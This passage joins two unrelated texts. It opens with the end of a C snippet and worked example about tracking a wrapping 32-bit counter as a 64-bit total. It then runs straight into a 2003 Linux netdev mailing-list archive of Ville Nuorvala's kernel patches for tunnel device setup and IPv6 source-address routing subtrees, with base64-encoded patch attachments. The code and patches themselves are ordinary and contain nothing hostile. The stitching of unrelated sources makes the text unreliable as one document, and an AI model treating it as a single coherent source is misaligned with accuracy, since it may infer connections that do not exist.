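static void counter64_init(struct counter64 *c, uint32_t first_sample)
{
	c->last = first_sample;
	c->total = first_sample;
}

/* Fold a new raw reading into the total.
 * The unsigned subtraction is done modulo 2^32, so the delta is
 * correct across a wrap, provided at most one wrap happened since
 * the previous sample (assumption: the sampling interval is short
 * enough for the link speed). */
static uint64_t counter64_update(struct counter64 *c, uint32_t sample)
{
	uint32_t delta = sample - c->last;

	c->last = sample;
	c->total += delta;
	return c->total;
}
```

For example, seeding with a raw reading of 4294967000 and then observing 704 gives a delta of 1000 despite the wrap, so the running total becomes 4294968000.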
From vnuorval@tcs.hut.fi Fri Jul 4 17:16:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:16:40 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650GO2x014726 for ; Fri, 4 Jul 2003 17:16:25 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 52C8C800217; Fri, 4 Jul 2003 16:00:31 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64D0V5L015331; Fri, 4 Jul 2003 16:00:31 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64D0T4J015327; Fri, 4 Jul 2003 16:00:30 +0300 Date: Fri, 4 Jul 2003 16:00:29 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, , Cc: netdev@oss.sgi.com Subject: [PATCH] Tunnel device init patch Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3758 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev Hello, I noticed a couple of bugs(?) in sit.c, ip_gre.c and ipip.c introduced in the alloc_netdev patches (csets 1.305.3.9, 1.305.3.10 and 1.1305.3.11). 
This patch made against cset 1.384 fixes the following issues:

- tunnel dev pointer also set for fallback tunnels
- dev name copied back to tunnel parameters so names autogenerated by kernel get correctly reported to userspace

Thanks,
Ville

diff -Nur linux-2.5.OLD/net/ipv4/ip_gre.c linux-2.5/net/ipv4/ip_gre.c
--- linux-2.5.OLD/net/ipv4/ip_gre.c	Fri Jul 4 15:01:54 2003
+++ linux-2.5/net/ipv4/ip_gre.c	Fri Jul 4 14:59:27 2003
@@ -1153,7 +1153,9 @@
 	tunnel = (struct ip_tunnel*)dev->priv;
 	iph = &tunnel->parms.iph;
-	tunnel->dev = dev;
+	tunnel->dev = dev;
+	strcpy(tunnel->parms.name, dev->name);
+
 	memcpy(dev->dev_addr, &tunnel->parms.iph.saddr, 4);
 	memcpy(dev->broadcast, &tunnel->parms.iph.daddr, 4);
@@ -1214,6 +1216,9 @@
 {
 	struct ip_tunnel *tunnel = (struct ip_tunnel*)dev->priv;
 	struct iphdr *iph = &tunnel->parms.iph;
+
+	tunnel->dev = dev;
+	strcpy(tunnel->parms.name, dev->name);
 	iph->version = 4;
 	iph->protocol = IPPROTO_GRE;
diff -Nur linux-2.5.OLD/net/ipv4/ipip.c linux-2.5/net/ipv4/ipip.c
--- linux-2.5.OLD/net/ipv4/ipip.c	Fri Jul 4 15:01:54 2003
+++ linux-2.5/net/ipv4/ipip.c	Fri Jul 4 14:59:27 2003
@@ -805,7 +805,10 @@
 	tunnel = (struct ip_tunnel*)dev->priv;
 	iph = &tunnel->parms.iph;
+	tunnel->dev = dev;
+	strcpy(tunnel->parms.name, dev->name);
+
 	memcpy(dev->dev_addr, &tunnel->parms.iph.saddr, 4);
 	memcpy(dev->broadcast, &tunnel->parms.iph.daddr, 4);
@@ -840,6 +843,9 @@
 {
 	struct ip_tunnel *tunnel = dev->priv;
 	struct iphdr *iph = &tunnel->parms.iph;
+
+	tunnel->dev = dev;
+	strcpy(tunnel->parms.name, dev->name);
 	iph->version = 4;
 	iph->protocol = IPPROTO_IPIP;
diff -Nur linux-2.5.OLD/net/ipv6/sit.c linux-2.5/net/ipv6/sit.c
--- linux-2.5.OLD/net/ipv6/sit.c	Fri Jul 4 15:01:55 2003
+++ linux-2.5/net/ipv6/sit.c	Fri Jul 4 14:59:27 2003
@@ -743,7 +743,10 @@
 	tunnel = (struct ip_tunnel*)dev->priv;
 	iph = &tunnel->parms.iph;
+	tunnel->dev = dev;
+	strcpy(tunnel->parms.name, dev->name);
+
 	memcpy(dev->dev_addr, &tunnel->parms.iph.saddr, 4);
 	memcpy(dev->broadcast, &tunnel->parms.iph.daddr, 4);
@@ -779,6 +782,9 @@
 {
 	struct ip_tunnel *tunnel = dev->priv;
 	struct iphdr *iph = &tunnel->parms.iph;
+
+	tunnel->dev = dev;
+	strcpy(tunnel->parms.name, dev->name);
 	iph->version = 4;
 	iph->protocol = IPPROTO_IPV6;

--
Ville Nuorvala
Research Assistant, Institute of Digital Communications,
Helsinki University of Technology
email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257

From vnuorval@tcs.hut.fi Fri Jul 4 17:16:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:16:43 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650GM2x014724 for ; Fri, 4 Jul 2003 17:16:23 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id 00867800225; Sat, 5 Jul 2003 01:11:24 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MBN5L017133; Sat, 5 Jul 2003 01:11:23 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MBN2L017129; Sat, 5 Jul 2003 01:11:23 +0300 Date: Sat, 5 Jul 2003 01:11:23 +0300 (EEST) From: Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com, , , , Subject: [PATCH][1/3] IPV6: split CONFIG_IPV6_SUBTREES fix In-Reply-To: <20030531.000319.114704530.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="-377318441-274968981-1057356683=:17083" X-archive-position: 3759 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev

This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info.

---377318441-274968981-1057356683=:17083
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,

now I've split and cleaned up the CONFIG_IPV6_SUBTREES patch I submitted earlier. The functionality should be equivalent to the previous version, but I'll still do some more bug tests on the code when I get back from my vacation on Monday :)

The patches are done against cset 1.1384 and are incremental.

The first patch doesn't actually fix any bugs in the IPv6 code, but tweaks tcp_v6_connect() a bit and makes the actual subtrees fix for TCP a bit cleaner.

Regards,
Ville

--
Ville Nuorvala
Research Assistant, Institute of Digital Communications,
Helsinki University of Technology
email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257

---377318441-274968981-1057356683=:17083
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="subtrees-1.patch"
Content-Transfer-Encoding: BASE64
Content-ID:
Content-Description:
Content-Disposition: attachment; filename="subtrees-1.patch"

ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9uZXQvaXB2Ni90Y3BfaXB2Ni5jIGxpbnV4LTIu NS9uZXQvaXB2Ni90Y3BfaXB2Ni5jDQotLS0gbGludXgtMi41Lk9MRC9uZXQv aXB2Ni90Y3BfaXB2Ni5jCVdlZCBKdWwgIDIgMTU6NDI6MDMgMjAwMw0KKysr IGxpbnV4LTIuNS9uZXQvaXB2Ni90Y3BfaXB2Ni5jCUZyaSBKdWwgIDQgMjM6 Mjg6MzIgMjAwMw0KQEAgLTU0NCw3ICs1NDQsNiBAQA0KIAlzdHJ1Y3QgaXB2 Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhzayk7DQogCXN0cnVjdCB0Y3Bfb3B0 ICp0cCA9IHRjcF9zayhzayk7DQogCXN0cnVjdCBpbjZfYWRkciAqc2FkZHIg PSBOVUxMOw0KLQlzdHJ1Y3QgaW42X2FkZHIgc2FkZHJfYnVmOw0KIAlzdHJ1 Y3QgZmxvd2kgZmw7DQogCXN0cnVjdCBkc3RfZW50cnkgKmRzdDsNCiAJaW50 IGFkZHJfdHlwZTsNCkBAIC02NzEsMjMgKzY3MCwyNCBAQA0KIAkJZ290byBm YWlsdXJlOw0KIAl9DQogDQotCWlwNl9kc3Rfc3RvcmUoc2ssIGRzdCwgTlVM TCk7DQotCXNrLT5za19yb3V0ZV9jYXBzID0gZHN0LT5kZXYtPmZlYXR1cmVz ICYNCi0JCQkgICAgfihORVRJRl9GX0lQX0NTVU0gfCBORVRJRl9GX1RTTyk7 DQotDQogCWlmIChzYWRkciA9PSBOVUxMKSB7DQotCQllcnIgPSBpcHY2X2dl
dF9zYWRkcihkc3QsICZucC0+ZGFkZHIsICZzYWRkcl9idWYpOw0KLQkJaWYg KGVycikNCisJCWVyciA9IGlwdjZfZ2V0X3NhZGRyKGRzdCwgJm5wLT5kYWRk ciwgJmZsLmZsNl9zcmMpOw0KKwkJaWYgKGVycikgew0KKwkJCWRzdF9yZWxl YXNlKGRzdCk7DQogCQkJZ290byBmYWlsdXJlOw0KLQ0KLQkJc2FkZHIgPSAm c2FkZHJfYnVmOw0KKwkJfQ0KKwkJc2FkZHIgPSAmZmwuZmw2X3NyYzsNCisJ CWlwdjZfYWRkcl9jb3B5KCZucC0+cmN2X3NhZGRyLCBzYWRkcik7DQogCX0N CiANCiAJLyogc2V0IHRoZSBzb3VyY2UgYWRkcmVzcyAqLw0KLQlpcHY2X2Fk ZHJfY29weSgmbnAtPnJjdl9zYWRkciwgc2FkZHIpOw0KIAlpcHY2X2FkZHJf Y29weSgmbnAtPnNhZGRyLCBzYWRkcik7DQogCWluZXQtPnJjdl9zYWRkciA9 IExPT1BCQUNLNF9JUFY2Ow0KIA0KKwlpcDZfZHN0X3N0b3JlKHNrLCBkc3Qs IE5VTEwpOw0KKwlzay0+c2tfcm91dGVfY2FwcyA9IGRzdC0+ZGV2LT5mZWF0 dXJlcyAmDQorCQkJICAgIH4oTkVUSUZfRl9JUF9DU1VNIHwgTkVUSUZfRl9U U08pOw0KKw0KIAl0cC0+ZXh0X2hlYWRlcl9sZW4gPSAwOw0KIAlpZiAobnAt Pm9wdCkNCiAJCXRwLT5leHRfaGVhZGVyX2xlbiA9IG5wLT5vcHQtPm9wdF9m bGVuICsgbnAtPm9wdC0+b3B0X25mbGVuOw0KQEAgLTcxNCw4ICs3MTQsOCBA QA0KIA0KIGxhdGVfZmFpbHVyZToNCiAJdGNwX3NldF9zdGF0ZShzaywgVENQ X0NMT1NFKTsNCi1mYWlsdXJlOg0KIAlfX3NrX2RzdF9yZXNldChzayk7DQor ZmFpbHVyZToNCiAJaW5ldC0+ZHBvcnQgPSAwOw0KIAlzay0+c2tfcm91dGVf Y2FwcyA9IDA7DQogCXJldHVybiBlcnI7DQo= ---377318441-274968981-1057356683=:17083-- From vnuorval@tcs.hut.fi Fri Jul 4 17:33:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 04 Jul 2003 17:33:24 -0700 (PDT) Received: from mail.tcs.hut.fi (mail.tcs.hut.fi [130.233.215.20]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h650X32x015088 for ; Fri, 4 Jul 2003 17:33:03 -0700 Received: from rhea.tcs.hut.fi (rhea.tcs.hut.fi [130.233.215.147]) by mail.tcs.hut.fi (Postfix) with ESMTP id CC7E1800226; Sat, 5 Jul 2003 01:25:20 +0300 (EEST) Received: from rhea.tcs.hut.fi (localhost [127.0.0.1]) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MPK5L017160; Sat, 5 Jul 2003 01:25:20 +0300 Received: from localhost (vnuorval@localhost) by rhea.tcs.hut.fi (8.12.3/8.12.3/Debian-5) with ESMTP id h64MPHnw017156; Sat, 5 Jul 2003 01:25:17 +0300 Date: Sat, 5 Jul 2003 01:25:17 +0300 (EEST) From: 
Ville Nuorvala To: yoshfuji@linux-ipv6.org, Cc: netdev@oss.sgi.com, , , , Subject: [PATCH][2/3] IPV6: split CONFIG_IPV6_SUBTREES fix In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="-377318441-1491903089-1057357517=:17083" X-archive-position: 3761 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: vnuorval@tcs.hut.fi Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. ---377318441-1491903089-1057357517=:17083 Content-Type: TEXT/PLAIN; charset=US-ASCII Hi, the second patch fixes the bugs with CONFIG_IPV6_SUBTREES so it doesn't crash the kernel anymore. The route lookups in the IPv6 code have also been changed to better take the source address into account. Regards, Ville -- Ville Nuorvala Research Assistant, Institute of Digital Communications, Helsinki University of Technology email: vnuorval@tcs.hut.fi, phone: +358 (0)9 451 5257 ---377318441-1491903089-1057357517=:17083 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="subtrees-2.patch" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="subtrees-2.patch" ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9pbmNsdWRlL2xpbnV4L2lwdjYuaCBsaW51eC0y LjUvaW5jbHVkZS9saW51eC9pcHY2LmgNCi0tLSBsaW51eC0yLjUuT0xEL2lu Y2x1ZGUvbGludXgvaXB2Ni5oCU1vbiBKdW4gMzAgMjA6MzY6MDAgMjAwMw0K KysrIGxpbnV4LTIuNS9pbmNsdWRlL2xpbnV4L2lwdjYuaAlGcmkgSnVsICA0 IDIzOjMyOjE0IDIwMDMNCkBAIC0xNTAsNyArMTUwLDkgQEANCiAJc3RydWN0 IGluNl9hZGRyIAlyY3Zfc2FkZHI7DQogCXN0cnVjdCBpbjZfYWRkcgkJZGFk ZHI7DQogCXN0cnVjdCBpbjZfYWRkcgkJKmRhZGRyX2NhY2hlOw0KLQ0KKyNp ZmRlZiBDT05GSUdfSVBWNl9TVUJUUkVFUw0KKwlzdHJ1Y3QgaW42X2FkZHIJ 
CSpzYWRkcl9jYWNoZTsNCisjZW5kaWYNCiAJX191MzIJCQlmbG93X2xhYmVs Ow0KIAlfX3UzMgkJCWZyYWdfc2l6ZTsNCiAJaW50CQkJaG9wX2xpbWl0Ow0K ZGlmZiAtTnVyIC0tZXhjbHVkZT1SQ1MgLS1leGNsdWRlPUNWUyAtLWV4Y2x1 ZGU9U0NDUyAtLWV4Y2x1ZGU9Qml0S2VlcGVyIC0tZXhjbHVkZT1DaGFuZ2VT ZXQgbGludXgtMi41Lk9MRC9pbmNsdWRlL25ldC9pcDZfcm91dGUuaCBsaW51 eC0yLjUvaW5jbHVkZS9uZXQvaXA2X3JvdXRlLmgNCi0tLSBsaW51eC0yLjUu T0xEL2luY2x1ZGUvbmV0L2lwNl9yb3V0ZS5oCU1vbiBKdW4gMzAgMjA6MzY6 MDAgMjAwMw0KKysrIGxpbnV4LTIuNS9pbmNsdWRlL25ldC9pcDZfcm91dGUu aAlGcmkgSnVsICA0IDIzOjMyOjE0IDIwMDMNCkBAIC0xMDIsNyArMTAyLDgg QEANCiAgKi8NCiANCiBzdGF0aWMgaW5saW5lIHZvaWQgaXA2X2RzdF9zdG9y ZShzdHJ1Y3Qgc29jayAqc2ssIHN0cnVjdCBkc3RfZW50cnkgKmRzdCwNCi0J CQkJICAgICBzdHJ1Y3QgaW42X2FkZHIgKmRhZGRyKQ0KKwkJCQkgc3RydWN0 IGluNl9hZGRyICpkYWRkciwNCisJCQkJIHN0cnVjdCBpbjZfYWRkciAqc2Fk ZHIpDQogew0KIAlzdHJ1Y3QgaXB2Nl9waW5mbyAqbnAgPSBpbmV0Nl9zayhz ayk7DQogCXN0cnVjdCBydDZfaW5mbyAqcnQgPSAoc3RydWN0IHJ0Nl9pbmZv ICopIGRzdDsNCkBAIC0xMTAsNiArMTExLDkgQEANCiAJd3JpdGVfbG9jaygm c2stPnNrX2RzdF9sb2NrKTsNCiAJX19za19kc3Rfc2V0KHNrLCBkc3QpOw0K IAlucC0+ZGFkZHJfY2FjaGUgPSBkYWRkcjsNCisjaWZkZWYgQ09ORklHX0lQ VjZfU1VCVFJFRVMNCisJbnAtPnNhZGRyX2NhY2hlID0gc2FkZHI7DQorI2Vu ZGlmDQogCW5wLT5kc3RfY29va2llID0gcnQtPnJ0Nmlfbm9kZSA/IHJ0LT5y dDZpX25vZGUtPmZuX3Nlcm51bSA6IDA7DQogCXdyaXRlX3VubG9jaygmc2st PnNrX2RzdF9sb2NrKTsNCiB9DQpkaWZmIC1OdXIgLS1leGNsdWRlPVJDUyAt LWV4Y2x1ZGU9Q1ZTIC0tZXhjbHVkZT1TQ0NTIC0tZXhjbHVkZT1CaXRLZWVw ZXIgLS1leGNsdWRlPUNoYW5nZVNldCBsaW51eC0yLjUuT0xEL25ldC9pcHY2 L0tjb25maWcgbGludXgtMi41L25ldC9pcHY2L0tjb25maWcNCi0tLSBsaW51 eC0yLjUuT0xEL25ldC9pcHY2L0tjb25maWcJTW9uIEp1biAzMCAyMDozNjow MyAyMDAzDQorKysgbGludXgtMi41L25ldC9pcHY2L0tjb25maWcJRnJpIEp1 bCAgNCAyMzozMjoxNCAyMDAzDQpAQCAtNjMsNCArNjMsMTIgQEANCiANCiAJ ICBJZiB1bnN1cmUsIHNheSBOLg0KIA0KK2NvbmZpZyBJUFY2X1NVQlRSRUVT DQorCWJvb2wgIklQdjY6IFNvdXJjZSBhZGRyZXNzIHJvdXRpbmciDQorCWRl cGVuZHMgb24gSVBWNg0KKwktLS1oZWxwLS0tDQorCSAgU3VwcG9ydCBmb3Ig YWR2YW5jZWQgcm91dGluZyBieSBib3RoIHNvdXJjZSBhbmQgZGVzdGluYXRp 
b24gYWRkcmVzcy4NCisNCisJICBJZiB1bnN1cmUsIHNheSBOLg0KKw0KIHNv dXJjZSAibmV0L2lwdjYvbmV0ZmlsdGVyL0tjb25maWciDQpkaWZmIC1OdXIg LS1leGNsdWRlPVJDUyAtLWV4Y2x1ZGU9Q1ZTIC0tZXhjbHVkZT1TQ0NTIC0t ZXhjbHVkZT1CaXRLZWVwZXIgLS1leGNsdWRlPUNoYW5nZVNldCBsaW51eC0y LjUuT0xEL25ldC9pcHY2L2lwNl9maWIuYyBsaW51eC0yLjUvbmV0L2lwdjYv aXA2X2ZpYi5jDQotLS0gbGludXgtMi41Lk9MRC9uZXQvaXB2Ni9pcDZfZmli LmMJTW9uIEp1biAzMCAyMDozNjowMyAyMDAzDQorKysgbGludXgtMi41L25l dC9pcHY2L2lwNl9maWIuYwlGcmkgSnVsICA0IDIzOjMyOjE0IDIwMDMNCkBA IC0xOCw2ICsxOCw3IEBADQogICogCVl1amkgU0VLSVlBIEBVU0FHSToJU3Vw cG9ydCBkZWZhdWx0IHJvdXRlIG9uIHJvdXRlciBub2RlOw0KICAqIAkJCQly ZW1vdmUgaXA2X251bGxfZW50cnkgZnJvbSB0aGUgdG9wIG9mDQogICogCQkJ CXJvdXRpbmcgdGFibGUuDQorICogCVZpbGxlIE51b3J2YWxhOgkJRml4ZWQg cm91dGluZyBzdWJ0cmVlcy4NCiAgKi8NCiAjaW5jbHVkZSA8bGludXgvY29u ZmlnLmg+DQogI2luY2x1ZGUgPGxpbnV4L2Vycm5vLmg+DQpAQCAtNDk2LDYg KzQ5Nyw4IEBADQogCQltb2RfdGltZXIoJmlwNl9maWJfdGltZXIsIGppZmZp ZXMgKyBpcDZfcnRfZ2NfaW50ZXJ2YWwpOw0KIH0NCiANCitzdGF0aWMgc3Ry dWN0IHJ0Nl9pbmZvICogZmliNl9maW5kX3ByZWZpeChzdHJ1Y3QgZmliNl9u b2RlICpmbik7DQorDQogLyoNCiAgKglBZGQgcm91dGluZyBpbmZvcm1hdGlv biB0byB0aGUgcm91dGluZyB0cmVlLg0KICAqCTxkZXN0aW5hdGlvbiBhZGRy Pi88c291cmNlIGFkZHI+DQpAQCAtNTA2LDYgKzUwOSw5IEBADQogew0KIAlz dHJ1Y3QgZmliNl9ub2RlICpmbjsNCiAJaW50IGVyciA9IC1FTk9NRU07DQor I2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQorCXN0cnVjdCBmaWI2X25v ZGUgKnBuID0gTlVMTDsNCisjZW5kaWYNCiANCiAJZm4gPSBmaWI2X2FkZF8x KHJvb3QsICZydC0+cnQ2aV9kc3QuYWRkciwgc2l6ZW9mKHN0cnVjdCBpbjZf YWRkciksDQogCQkJcnQtPnJ0NmlfZHN0LnBsZW4sICh1OCopICZydC0+cnQ2 aV9kc3QgLSAodTgqKSBydCk7DQpAQCAtNTU4LDEwICs1NjQsNiBAQA0KIAkJ CS8qIE5vdyBsaW5rIG5ldyBzdWJ0cmVlIHRvIG1haW4gdHJlZSAqLw0KIAkJ CXNmbi0+cGFyZW50ID0gZm47DQogCQkJZm4tPnN1YnRyZWUgPSBzZm47DQot CQkJaWYgKGZuLT5sZWFmID09IE5VTEwpIHsNCi0JCQkJZm4tPmxlYWYgPSBy dDsNCi0JCQkJYXRvbWljX2luYygmcnQtPnJ0NmlfcmVmKTsNCi0JCQl9DQog CQl9IGVsc2Ugew0KIAkJCXNuID0gZmliNl9hZGRfMShmbi0+c3VidHJlZSwg JnJ0LT5ydDZpX3NyYy5hZGRyLA0KIAkJCQkJc2l6ZW9mKHN0cnVjdCBpbjZf 
YWRkciksIHJ0LT5ydDZpX3NyYy5wbGVuLA0KQEAgLTU3MSw2ICs1NzMsMTMg QEANCiAJCQkJZ290byBzdF9mYWlsdXJlOw0KIAkJfQ0KIA0KKwkJLyogZmli Nl9hZGRfMSBtaWdodCBoYXZlIGNsZWFyZWQgdGhlIG9sZCBsZWFmIHBvaW50 ZXIgKi8NCisJCWlmIChmbi0+bGVhZiA9PSBOVUxMKSB7DQorCQkJZm4tPmxl YWYgPSBydDsNCisJCSAgYXRvbWljX2luYygmcnQtPnJ0NmlfcmVmKTsNCisJ CX0NCisNCisJCXBuID0gZm47DQogCQlmbiA9IHNuOw0KIAl9DQogI2VuZGlm DQpAQCAtNTg0LDggKzU5MywyNCBAQA0KIAl9DQogDQogb3V0Og0KLQlpZiAo ZXJyKQ0KKwlpZiAoZXJyKSB7DQorI2lmZGVmIENPTkZJR19JUFY2X1NVQlRS RUVTDQorCQkvKiBJZiBmaWI2X2FkZF8xIGhhcyBjbGVhcmVkIHRoZSBvbGQg bGVhZiBwb2ludGVyIGluIHRoZSANCisJCSAgIHN1cGVyLXRyZWUgbGVhZiBu b2RlIHdlIGhhdmUgdG8gZmluZCBhIG5ldyBvbmUgZm9yIGl0LiAqLw0KKwkJ DQorCQlpZiAocG4gJiYgIShwbi0+Zm5fZmxhZ3MgJiBSVE5fUlRJTkZPKSkg ew0KKwkJCXBuLT5sZWFmID0gZmliNl9maW5kX3ByZWZpeChwbik7DQorI2lm IFJUNl9ERUJVRyA+PSAyDQorCQkJaWYgKCFwbi0+bGVhZikgew0KKwkJCQlC VUdfVFJBUChwbi0+bGVhZik7DQorCQkJCXBuLT5sZWFmID0gJmlwNl9udWxs X2VudHJ5Ow0KKwkJCX0NCisjZW5kaWYNCisJCQlhdG9taWNfaW5jKCZwbi0+ bGVhZi0+cnQ2aV9yZWYpOw0KKwkJfQ0KKyNlbmRpZg0KIAkJZHN0X2ZyZWUo JnJ0LT51LmRzdCk7DQorCX0NCiAJcmV0dXJuIGVycjsNCiANCiAjaWZkZWYg Q09ORklHX0lQVjZfU1VCVFJFRVMNCkBAIC02MzcsMzIgKzY2MiwzMSBAQA0K IAkJYnJlYWs7DQogCX0NCiANCi0Jd2hpbGUgKChmbi0+Zm5fZmxhZ3MgJiBS VE5fUk9PVCkgPT0gMCkgew0KKwlmb3IgKDs7KSB7DQorCQlpZiAoU1VCVFJF RShmbikgfHwgZm4tPmZuX2ZsYWdzICYgUlROX1JUSU5GTykgew0KKwkJCXN0 cnVjdCBydDZrZXkgKmtleTsNCisJCQlrZXkgPSAoc3RydWN0IHJ0NmtleSAq KSAoKHU4ICopIGZuLT5sZWFmICsgYXJncy0+b2Zmc2V0KTsNCisJCQkNCisJ CQlpZiAoYWRkcl9tYXRjaCgma2V5LT5hZGRyLCBhcmdzLT5hZGRyLCBrZXkt PnBsZW4pKSB7DQogI2lmZGVmIENPTkZJR19JUFY2X1NVQlRSRUVTDQotCQlp ZiAoZm4tPnN1YnRyZWUpIHsNCi0JCQlzdHJ1Y3QgZmliNl9ub2RlICpzdDsN Ci0JCQlzdHJ1Y3QgbG9va3VwX2FyZ3MgKm5hcmc7DQotDQotCQkJbmFyZyA9 IGFyZ3MgKyAxOw0KLQ0KLQkJCWlmIChuYXJnLT5hZGRyKSB7DQotCQkJCXN0 ID0gZmliNl9sb29rdXBfMShmbi0+c3VidHJlZSwgbmFyZyk7DQotDQotCQkJ CWlmIChzdCAmJiAhKHN0LT5mbl9mbGFncyAmIFJUTl9ST09UKSkNCi0JCQkJ CXJldHVybiBzdDsNCi0JCQl9DQotCQl9DQorCQkJCWlmIChmbi0+c3VidHJl 
ZSkgew0KKwkJCQkJc3RydWN0IGxvb2t1cF9hcmdzICpuYXJnID0gYXJncyAr IDE7DQorCQkJCQkNCisJCQkJCWlmIChuYXJnLT5hZGRyKSB7DQorCQkJCQkJ c3RydWN0IGZpYjZfbm9kZSAqc3Q7DQorCQkJCQkJc3QgPSBmaWI2X2xvb2t1 cF8xKGZuLT5zdWJ0cmVlLCBuYXJnKTsNCisJCQkJCQkNCisJCQkJCQlpZiAo c3QpDQorCQkJCQkJCXJldHVybiBzdDsNCisJCQkJCX0NCisJCQkJfQ0KICNl bmRpZg0KLQ0KLQkJaWYgKGZuLT5mbl9mbGFncyAmIFJUTl9SVElORk8pIHsN Ci0JCQlzdHJ1Y3QgcnQ2a2V5ICprZXk7DQotDQotCQkJa2V5ID0gKHN0cnVj dCBydDZrZXkgKikgKCh1OCAqKSBmbi0+bGVhZiArDQotCQkJCQkJIGFyZ3Mt Pm9mZnNldCk7DQotDQotCQkJaWYgKGFkZHJfbWF0Y2goJmtleS0+YWRkciwg YXJncy0+YWRkciwga2V5LT5wbGVuKSkNCi0JCQkJcmV0dXJuIGZuOw0KKwkJ CQlpZiAoZm4tPmZuX2ZsYWdzICYgUlROX1JUSU5GTykNCisJCQkJCXJldHVy biBmbjsNCisJCQl9DQogCQl9DQorCQlpZiAoZm4tPmZuX2ZsYWdzICYgUlRO X1JPT1QpDQorCQkJYnJlYWs7DQogDQogCQlmbiA9IGZuLT5wYXJlbnQ7DQog CX0NCkBAIC03NDEsMTIgKzc2NSwxMiBAQA0KIA0KICNpZmRlZiBDT05GSUdf SVBWNl9TVUJUUkVFUw0KIAlpZiAoc3JjX2xlbikgew0KLQkJQlVHX1RSQVAo c2FkZHIhPU5VTEwpOw0KLQkJaWYgKGZuID09IE5VTEwpDQotCQkJZm4gPSBm bi0+c3VidHJlZTsNCi0JCWlmIChmbikNCi0JCQlmbiA9IGZpYjZfbG9jYXRl XzEoZm4sIHNhZGRyLCBzcmNfbGVuLA0KKwkJQlVHX1RSQVAoc2FkZHIgIT0g TlVMTCk7DQorCQlpZiAoZm4gJiYgZm4tPnN1YnRyZWUpDQorCQkJZm4gPSBm aWI2X2xvY2F0ZV8xKGZuLT5zdWJ0cmVlLCBzYWRkciwgc3JjX2xlbiwNCiAJ CQkJCSAgICh1OCopICZydC0+cnQ2aV9zcmMgLSAodTgqKSBydCk7DQorCQll bHNlDQorCQkJcmV0dXJuIE5VTEw7DQogCX0NCiAjZW5kaWYNCiANCmRpZmYg LU51ciAtLWV4Y2x1ZGU9UkNTIC0tZXhjbHVkZT1DVlMgLS1leGNsdWRlPVND Q1MgLS1leGNsdWRlPUJpdEtlZXBlciAtLWV4Y2x1ZGU9Q2hhbmdlU2V0IGxp bnV4LTIuNS5PTEQvbmV0L2lwdjYvaXA2X291dHB1dC5jIGxpbnV4LTIuNS9u ZXQvaXB2Ni9pcDZfb3V0cHV0LmMNCi0tLSBsaW51eC0yLjUuT0xEL25ldC9p cHY2L2lwNl9vdXRwdXQuYwlXZWQgSnVsICAyIDE1OjQyOjAzIDIwMDMNCisr KyBsaW51eC0yLjUvbmV0L2lwdjYvaXA2X291dHB1dC5jCUZyaSBKdWwgIDQg 